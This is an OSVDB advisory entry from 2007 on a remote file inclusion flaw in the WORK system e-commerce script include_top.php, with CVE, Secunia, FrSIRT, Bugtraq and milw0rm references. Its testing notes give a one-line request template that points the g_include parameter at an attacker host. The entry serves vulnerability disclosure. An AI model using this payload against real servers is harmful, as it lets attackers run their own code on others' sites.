WORK system e-commerce include/include_top.php g_include Variable Remote File Inclusion

2007-03-10T08:33:59
ID OSVDB:33973
Type osvdb
Reporter OSVDB
Modified 2007-03-10T08:33:59

Description

Manual Testing Notes

http://[target]/[path]/include/include_top.php?g_include=http://[attacker]

References:

Secunia Advisory ID:24476 Other Advisory URL: http://milw0rm.com/exploits/3448 FrSIRT Advisory: ADV-2007-0903 CVE-2007-1423 Bugtraq ID: 22908